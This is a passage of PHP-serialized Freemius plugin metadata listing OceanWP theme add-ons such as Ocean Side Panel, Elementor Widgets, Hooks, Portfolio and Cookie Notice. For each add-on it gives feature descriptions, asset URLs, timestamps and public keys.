Panel\";s:4:\"slug\";s:16:\"ocean-side-panel\";s:12:\"premium_slug\";s:16:\"ocean-side-panel\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:7;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3756\";s:11:\"description\";s:443:\"<ul>\n<li>Add your widgets into the Side Panel sidebar</li>\n<li>Choose your icon for the opening button</li>\n<li>Add text for the opening button</li>\n<li>Add a custom width for the panel</li>\n<li>Display the panel to the left or right</li>\n<li>Displace or not the panel</li>\n<li>Add an overlay when the panel is opened</li>\n<li>Show/Hide the close button of the panel</li>\n<li>Change the close button text</li>\n<li>Add your own color</li> </ul>\";s:17:\"short_description\";s:63:\"Add a responsive side panel with your preferred widgets inside.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3756/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3756/card_banner.png\";s:15:\"selling_point_0\";s:44:\"Add your widgets into the Side Panel sidebar\";s:15:\"selling_point_1\";s:39:\"Choose your icon for the opening button\";s:15:\"selling_point_2\";s:31:\"Add text for the opening button\";s:11:\"screenshots\";O:8:\"stdClass\":1:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3756/screenshots/0.png\";}s:2:\"id\";s:3:\"827\";s:7:\"updated\";s:19:\"2019-08-04 07:22:03\";s:7:\"created\";s:19:\"2019-05-16 05:00:01\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_95ab9dabcffc015befcfaf19dd91e\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3756\";s:7:\"updated\";s:19:\"2021-08-15 20:30:32\";s:7:\"created\";s:19:\"2019-05-06 13:30:08\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:3;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:23:\"Ocean Elementor Widgets\";s:4:\"slug\";s:23:\"ocean-elementor-widgets\";s:12:\"premium_slug\";s:23:\"ocean-elementor-widgets\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:17;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3757\";s:11:\"description\";s:1290:\"<ul>\n<li>Accordions widget</li>\n<li>Advanced Custom Field widget, thanks to Bruno Tritsch for the help</li>\n<li>Advanced Heading widget</li>\n<li>Animated Heading widget</li>\n<li>Banner widget</li>\n<li>Brands widget</li>\n<li>Business Hours widget</li>\n<li>Button Effects widget</li>\n<li>Buttons widget</li>\n<li>Call To Action widget</li>\n<li>Circle Progress widget</li>\n<li>Countdown widget</li>\n<li>Divider widget, to add a text or an icon in the divider</li>\n<li>Flip Box widget</li>\n<li>Google Maps widget</li>\n<li>Hotspots widget</li>\n<li>Image Comparison widget</li>\n<li>Image Gallery widget</li>\n<li>Info Box widget</li>\n<li>Instagram Feed widget</li>\n<li>Link Effects widget</li>\n<li>Login widget</li>\n<li>Lost Password widget</li>\n<li>Register widget</li>\n<li>Modal widget</li>\n<li>Navbar widget</li>\n<li>Off Canvas widget</li>\n<li>Price List widget</li>\n<li>Recipe widget</li>\n<li>Scroll Up widget</li>\n<li>Switch widget</li>\n<li>Table widget</li>\n<li>Tabs widget</li>\n<li>Team Members widget</li>\n<li>Timeline widget</li>\n<li>Contact Form 7 widget</li>\n<li>Gravity Forms widget</li>\n<li>WPForms widget</li>\n<li>Caldera Forms widget</li>\n<li>Ninja Forms widget</li>\n<li>WooCommerce Products widget</li>\n<li>WooCommerce Categories widget</li>\n<li>WooCommerce Slider widget</li> </ul>\";s:17:\"short_description\";s:75:\"Add many new powerful widgets to the popular free page builder - Elementor.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3757/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3757/card_banner.png\";s:15:\"selling_point_0\";s:23:\"Image Comparison widget\";s:15:\"selling_point_1\";s:21:\"Instagram Feed widget\";s:15:\"selling_point_2\";s:12:\"Table widget\";s:11:\"screenshots\";O:8:\"stdClass\":4:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3757/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3757/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3757/screenshots/2.png\";s:12:\"screenshot_3\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3757/screenshots/3.png\";}s:2:\"id\";s:3:\"820\";s:7:\"updated\";s:19:\"2019-08-04 06:51:31\";s:7:\"created\";s:19:\"2019-05-16 04:53:49\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_25eeed8cddc1b8bede158756886e8\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3757\";s:7:\"updated\";s:19:\"2021-08-15 20:51:30\";s:7:\"created\";s:19:\"2019-05-06 13:36:11\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:4;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:11:\"Ocean Hooks\";s:4:\"slug\";s:11:\"ocean-hooks\";s:12:\"premium_slug\";s:11:\"ocean-hooks\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:3;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3758\";s:11:\"description\";s:278:\"<ul>\n<li>Add different content for the same hook location</li>\n<li>Add shortcode</li>\n<li>Add PHP code</li>\n<li>Add content only for logged in/out users</li>\n<li>Display your code on the page/post/taxonomy you want</li>\n<li>Display your code on the user role you want</li> </ul>\";s:17:\"short_description\";s:60:\"Add your custom content throughout various areas of OceanWP.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3758/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3758/card_banner.png\";s:15:\"selling_point_0\";s:48:\"Add different content for the same hook location\";s:15:\"selling_point_1\";s:13:\"Add shortcode\";s:15:\"selling_point_2\";s:12:\"Add PHP code\";s:11:\"screenshots\";O:8:\"stdClass\":3:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3758/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3758/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3758/screenshots/2.png\";}s:2:\"id\";s:3:\"823\";s:7:\"updated\";s:19:\"2019-08-04 07:02:53\";s:7:\"created\";s:19:\"2019-05-16 04:54:56\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_bf5672ee85c0032b2b4d7c0a3d244\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3758\";s:7:\"updated\";s:19:\"2021-08-15 19:22:41\";s:7:\"created\";s:19:\"2019-05-06 13:39:32\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:5;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:19:\"Ocean Sticky Footer\";s:4:\"slug\";s:19:\"ocean-sticky-footer\";s:12:\"premium_slug\";s:19:\"ocean-sticky-footer\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:5;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3759\";s:11:\"description\";s:163:\"<ul>\n<li>Add menu in the footer bar</li>\n<li>Add text in the footer bar</li>\n<li>Choose your own colors</li>\n<li>Hide Menu and/or text on mobile screens</li> </ul>\";s:17:\"short_description\";s:69:\"A simple extension to attach your footer to the bottom of the screen.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3759/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3759/card_banner.png\";s:15:\"selling_point_0\";s:26:\"Add menu in the footer bar\";s:15:\"selling_point_1\";s:26:\"Add text in the footer bar\";s:15:\"selling_point_2\";s:22:\"Choose your own colors\";s:11:\"screenshots\";O:8:\"stdClass\":2:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3759/screenshots/0.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3759/screenshots/2.png\";}s:2:\"id\";s:3:\"828\";s:7:\"updated\";s:19:\"2019-08-04 07:25:54\";s:7:\"created\";s:19:\"2019-05-16 05:00:32\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_5552f1b8d38d0f09df4b2990b57b2\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3759\";s:7:\"updated\";s:19:\"2021-08-15 20:31:06\";s:7:\"created\";s:19:\"2019-05-06 13:41:42\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:6;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:15:\"Ocean Woo Popup\";s:4:\"slug\";s:15:\"ocean-woo-popup\";s:12:\"premium_slug\";s:15:\"ocean-woo-popup\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:4;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3760\";s:11:\"description\";s:333:\"<ul>\n<li>Select an Elementor template (or a page if you use another page builder) to replace the content of the popup</li>\n<li>Control width, height, padding and the border radius</li>\n<li>Show/hide and reorganize the elements of the popup</li>\n<li>Replace all the texts from the customizer</li>\n<li>Choose your own colors</li> </ul>\";s:17:\"short_description\";s:79:\"A simple extension to display a popup when you click on the Add To Cart button.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3760/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3760/card_banner.png\";s:15:\"selling_point_0\";s:108:\"Select an Elementor template (or a page if you use another page builder) to replace the content of the popup\";s:15:\"selling_point_1\";s:52:\"Control width, height, padding and the border radius\";s:15:\"selling_point_2\";s:50:\"Show/hide and reorganize the elements of the popup\";s:11:\"screenshots\";O:8:\"stdClass\":2:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3760/screenshots/0.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3760/screenshots/2.png\";}s:2:\"id\";s:3:\"831\";s:7:\"updated\";s:19:\"2019-08-04 07:39:37\";s:7:\"created\";s:19:\"2019-05-16 05:02:03\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_9414dbc7719b150c20046f728e994\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3760\";s:7:\"updated\";s:19:\"2021-08-15 20:32:16\";s:7:\"created\";s:19:\"2019-05-06 13:53:08\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:7;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:15:\"Ocean Portfolio\";s:4:\"slug\";s:15:\"ocean-portfolio\";s:12:\"premium_slug\";s:15:\"ocean-portfolio\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:8;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3761\";s:11:\"description\";s:473:\"<ul>\n<li>Display your portfolio anywhere you want via a page template or a shortcode</li>\n<li>Show/hide the filter bar</li>\n<li>Control the filter bar positioning, styling and typography</li>\n<li>Control the portfolio items styling like the margin, padding, color, overlay color,\ntypography, etc...</li>\n<li>Add your own images width and height</li>\n<li>Display items by author, categories or tags, sort by order and exclude categories</li>\n<li>And a lot more...</li> </ul>\";s:17:\"short_description\";s:75:\"A complete extension to display your portfolio and work in a beautiful way.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3761/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3761/card_banner.png\";s:15:\"selling_point_0\";s:75:\"Display your portfolio anywhere you want via a page template or a shortcode\";s:15:\"selling_point_1\";s:24:\"Show/hide the filter bar\";s:15:\"selling_point_2\";s:58:\"Control the filter bar positioning, styling and typography\";s:11:\"screenshots\";O:8:\"stdClass\":3:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3761/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3761/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3761/screenshots/2.png\";}s:2:\"id\";s:3:\"826\";s:7:\"updated\";s:19:\"2019-08-04 07:20:12\";s:7:\"created\";s:19:\"2019-05-16 04:56:11\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_d0109c81ea2f48fdfa29c30d9d20b\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3761\";s:7:\"updated\";s:19:\"2021-08-15 19:22:45\";s:7:\"created\";s:19:\"2019-05-06 13:55:52\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:8;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:17:\"Ocean White Label\";s:4:\"slug\";s:17:\"ocean-white-label\";s:12:\"premium_slug\";s:17:\"ocean-white-label\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:2;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3762\";s:11:\"description\";s:302:\"<ul>\n<li>Add your own branding name in the admin pages</li>\n<li>Add your own theme name</li>\n<li>Add your own theme author</li>\n<li>Add your own theme author url</li>\n<li>Add your own theme description</li>\n<li>Add your own theme screenshot</li>\n<li>Remove the White Label box in Theme Panel</li> </ul>\";s:17:\"short_description\";s:69:\"Impress clients by replacing the OceanWP name by your own brand name.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3762/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3762/card_banner.png\";s:15:\"selling_point_0\";s:45:\"Add your own branding name in the admin pages\";s:15:\"selling_point_1\";s:68:\"Add your own theme name, author, author url, description, screenshot\";s:15:\"selling_point_2\";s:41:\"Remove the White Label box in Theme Panel\";s:11:\"screenshots\";O:8:\"stdClass\":3:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3762/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3762/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3762/screenshots/2.png\";}s:2:\"id\";s:3:\"830\";s:7:\"updated\";s:19:\"2019-08-04 07:36:38\";s:7:\"created\";s:19:\"2019-05-16 05:01:36\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_c9bb8f8d46af4c19cc2b66105accb\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3762\";s:7:\"updated\";s:19:\"2021-08-15 20:32:45\";s:7:\"created\";s:19:\"2019-05-06 13:57:59\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:9;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:15:\"Ocean Instagram\";s:4:\"slug\";s:15:\"ocean-instagram\";s:12:\"premium_slug\";s:15:\"ocean-instagram\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:2;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3763\";s:11:\"description\";s:224:\"<ul>\n<li>Display your Instagram photos</li>\n<li>Choose the column number</li>\n<li>Show/hide the likes &amp; comments</li>\n<li>Show/hide the captions</li>\n<li>Display your username, follow, posts, biograhpy, etc...</li> </ul>\";s:17:\"short_description\";s:70:\"Fetch and customize your Instagram feed to display in a beautiful way.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3763/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3763/card_banner.png\";s:15:\"selling_point_0\";s:29:\"Display your Instagram photos\";s:15:\"selling_point_1\";s:24:\"Choose the column number\";s:15:\"selling_point_2\";s:34:\"Show/hide the likes &amp; comments\";s:11:\"screenshots\";O:8:\"stdClass\":3:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3763/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3763/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3763/screenshots/2.png\";}s:2:\"id\";s:3:\"824\";s:7:\"updated\";s:19:\"2019-08-04 07:11:09\";s:7:\"created\";s:19:\"2019-05-16 04:55:16\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_60babf307a20c89d435bcd61d54e8\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3763\";s:7:\"updated\";s:19:\"2021-08-15 19:22:53\";s:7:\"created\";s:19:\"2019-05-06 14:00:21\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:10;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:17:\"Ocean Popup Login\";s:4:\"slug\";s:17:\"ocean-popup-login\";s:12:\"premium_slug\";s:17:\"ocean-popup-login\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:7;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3764\";s:11:\"description\";s:185:\"<ul>\n<li>Add the login/register link where you want</li>\n<li>Style the form</li>\n<li>Add a background image in the form</li>\n<li>Change the title and description for the form</li> </ul>\";s:17:\"short_description\";s:59:\"A plugin to add a popup login/register form where you want.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3764/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3764/card_banner.png\";s:15:\"selling_point_0\";s:42:\"Add the login/register link where you want\";s:15:\"selling_point_1\";s:14:\"Style the form\";s:15:\"selling_point_2\";s:34:\"Add a background image in the form\";s:11:\"screenshots\";O:8:\"stdClass\":3:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3764/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3764/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3764/screenshots/2.png\";}s:2:\"id\";s:3:\"825\";s:7:\"updated\";s:19:\"2019-08-04 07:12:58\";s:7:\"created\";s:19:\"2019-05-16 04:55:50\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_e0499681c773af2bbac0016bb24ff\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3764\";s:7:\"updated\";s:19:\"2021-08-15 19:22:48\";s:7:\"created\";s:19:\"2019-05-06 14:02:12\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:11;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:19:\"Ocean Cookie Notice\";s:4:\"slug\";s:19:\"ocean-cookie-notice\";s:12:\"premium_slug\";s:19:\"ocean-cookie-notice\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:4;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3765\";s:11:\"description\";s:368:\"<ul>\n<li>Add scripts that will be loaded only after the user consent</li>\n<li>Choose to reload the page after the cookie accept</li>\n<li>Two notice styles</li>\n<li>Add your own content</li>\n<li>Add your own button text</li>\n<li>Choose between a button or a close icon to close the notice</li>\n<li>Many styling settings to customize every parts of the notice</li> </ul>\";s:17:\"short_description\";s:91:\"\nInform users that you are using cookies to comply with the EU cookie law GDPR regulations.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3765/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3765/card_banner.png\";s:15:\"selling_point_0\";s:59:\"Add scripts that will be loaded only after the user consent\";s:15:\"selling_point_1\";s:49:\"Choose to reload the page after the cookie accept\";s:15:\"selling_point_2\";s:17:\"Two notice styles\";s:11:\"screenshots\";O:8:\"stdClass\":4:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3765/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3765/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3765/screenshots/2.png\";s:12:\"screenshot_3\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3765/screenshots/3.png\";}s:2:\"id\";s:3:\"817\";s:7:\"updated\";s:19:\"2019-08-04 06:36:09\";s:7:\"created\";s:19:\"2019-05-15 10:13:47\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_2ebffcd411ce5f21e543822065b7d\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3765\";s:7:\"updated\";s:19:\"2021-08-15 19:22:33\";s:7:\"created\";s:19:\"2019-05-06 14:04:05\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:12;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:17:\"Ocean Full Screen\";s:4:\"slug\";s:17:\"ocean-full-screen\";s:12:\"premium_slug\";s:17:\"ocean-full-screen\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:3;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3766\";s:11:\"description\";s:241:\"<ul>\n<li>Very easy to use</li>\n<li>Add your own scrolling speed</li>\n<li>Add a side navigation</li>\n<li>Change the navigation color</li>\n<li>Add tooltips to the navigation</li>\n<li>Disable the scrolling effect at the size you want</li> </ul>\";s:17:\"short_description\";s:63:\"A simple and easy way to create a fullscreen scrolling website.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3766/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3766/card_banner.png\";s:15:\"selling_point_0\";s:16:\"Very easy to use\";s:15:\"selling_point_1\";s:28:\"Add your own scrolling speed\";s:15:\"selling_point_2\";s:21:\"Add a side navigation\";s:11:\"screenshots\";O:8:\"stdClass\":3:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3766/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3766/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3766/screenshots/2.png\";}s:2:\"id\";s:3:\"822\";s:7:\"updated\";s:19:\"2019-08-04 06:57:28\";s:7:\"created\";s:19:\"2019-05-16 04:54:33\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_e0f5fb19e66d3b97f64adb891fae5\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3766\";s:7:\"updated\";s:19:\"2021-08-15 20:09:43\";s:7:\"created\";s:19:\"2019-05-06 14:06:43\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:13;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:15:\"Ocean Pro Demos\";s:4:\"slug\";s:15:\"ocean-pro-demos\";s:12:\"premium_slug\";s:15:\"ocean-pro-demos\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:11;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_a34c58ab5e7159d54e88175c1c03f\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3797\";s:7:\"updated\";s:19:\"2021-08-15 20:38:56\";s:7:\"created\";s:19:\"2019-05-14 12:39:32\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:14;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:11:\"Ocean 